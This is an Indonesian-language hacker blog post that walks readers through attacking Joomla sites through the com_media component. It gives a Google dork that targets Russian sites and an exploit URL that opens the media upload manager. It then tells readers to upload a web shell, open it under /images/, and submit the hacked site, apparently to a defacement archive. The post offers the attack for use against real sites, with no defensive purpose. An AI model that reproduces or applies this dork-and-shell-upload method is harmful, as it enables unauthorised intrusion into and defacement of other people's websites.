Ya komika .... :v
kali ini saya akan share teknik jadoel lagi nehh :3 haha ya exploit ini memang sudah cukup tua :'v tapi masih joss sampai sekarang :v
"Component Media atau Com_Media Vulnerability"
langsung aja yuk gan ke TKP :v
seperti biasa gan kita gunakan dork dan exploit ....
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Dork:
inurl:index.php?option=com_media site:ru (use your brain b!tch)
Exploit : index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Nah coba gunain dorknya ,, temuin dah site yang sekiranya vuln :v
masukin exploitnya ke site yang lu pilih ,, kalo vuln seperti ini :
Tinggal pilih file / shell yang lu mau lu upload
Klik upload ,, kemudian akses shell lu di patch site.anu/images/fileelu.anu
kek punya gue nih
Lepas tu serah lu dahh mau submit kemana juga ,, nehh punya gua mah
Sampai jumpa lagi nzenkk ! (-_-") jangan lupa Komeng ! (-_-")
http://www.lokerilmu-it.com/2015/11/exploit-component-media-vulnerability.html
ReplyDelete